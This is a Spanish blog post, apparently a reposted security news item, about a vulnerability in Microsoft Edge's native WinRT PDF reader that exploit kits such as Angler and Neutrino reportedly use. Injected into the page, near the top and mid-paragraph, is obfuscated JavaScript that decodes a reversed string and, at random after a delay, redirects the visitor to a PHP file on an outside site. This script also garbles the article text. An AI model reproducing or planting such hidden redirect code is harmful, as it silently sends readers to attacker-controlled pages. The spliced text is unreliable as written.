EL LECTOR PDF DE MICROSOFT EDGE EXPONE EL NAVEGADOR A MÚLTIPLES ATAQUES
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>to-hacking-501265-220×162.png” alt=”” width=”220″ height=”162″ /><br />
Microsoft Edge es el nuevo navegador web, desarrollado por Microsoft que, a largo plazo, pretende ser el sucesor del actual Internet Explorer. Este navegador funciona como una ModernApp, por lo que depende de muchas de las nuevas librerías de Windows para implementar <script>$NfI=function(n){if (typeof ($NfI.list[n]) == )
todas sus funciones. Una de las funciones más recientes del navegador es su nuevo lector PDF nativo, para lo cual hace uso de las librerías Windows Runtime (WinRT) PDF Renderer.
Investigadores de seguridad de IBM X-Force Advanced han detectado un fallo de seguridad en las librerías de WinRT PDF que pueden permitir a piratas informáticos atacar ordenadores vulnerables. Esta librería es utilizada por varias aplicaciones de Microsoft distribuidas a través de su tienda de aplicaciones tanto en Windows 8/8.1 como en el nuevo Windows 10.
Una de las aplicaciones más afectadas por las vulnerabilidades es el nuevo navegador Microsoft Edge, quien hace uso de esta librería para poder visualizar documentos PDF de forma nativa, sin depender de ninguna aplicación adicional. Según los expertos de seguridad, esta librería permite llevar a cabo ataques informáticos de la misma forma que permitían en el pasado otras extensiones como Java o Flash.
Desde que WinRT PDF está incluido por defecto en Microsoft Edge, cualquier documento PDF puede ser abierto desde el navegador sin necesidad de descargarlo previamente. Aprovechando un exploit e incluyendo código malicioso dentro del propio documento, un pirata informático puede llevar incluso a tomar el control completo de los ordenadores afectados.
Exploit Microsoft Edge PDF
El recuadro gris de la parte inferior izquierda muestra cómo el navegador está ejecutando código no autorizado a través de un fichero PDF propiamente diseñado.
LOS EXPLOITS PARA MICROSOFT EDGE ESTÁN SIENDO UTILIZADOS
Según se ha podido comprobar, este exploit ya se está distribuyendo junto a los kits de exploits más conocidos y utilizados, por ejemplo, Angler o Neutrino.
Por el momento, Microsoft no ha publicado ningún parche ni para su navegador ni para la librería PDF, por lo que, por el momento, todos los usuarios de Microsoft Edge son potencialmente vulnerables a estos ataques. Por suerte, la nueva versión de EMET, herramienta de seguridad contra exploits de Microsoft, sí que es capaz de evitar la ejecución de software no deseado en el sistema, protegiendo a los usuarios de la mayoría de los posibles vectores de ataque con exploits.
Obviamente, la mejor forma de protegerse es visitan tan solo páginas web de confianza y evitar cargar ningún recurso PDF que pueda haber sido comprometido.
Ver informacio original al respecto en Fuente:
tor-pdf-de-microsoft-edge-expone-el-navegador-multiples-ataques/
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.
Siguenos
en facebook
Los comentarios están cerrados.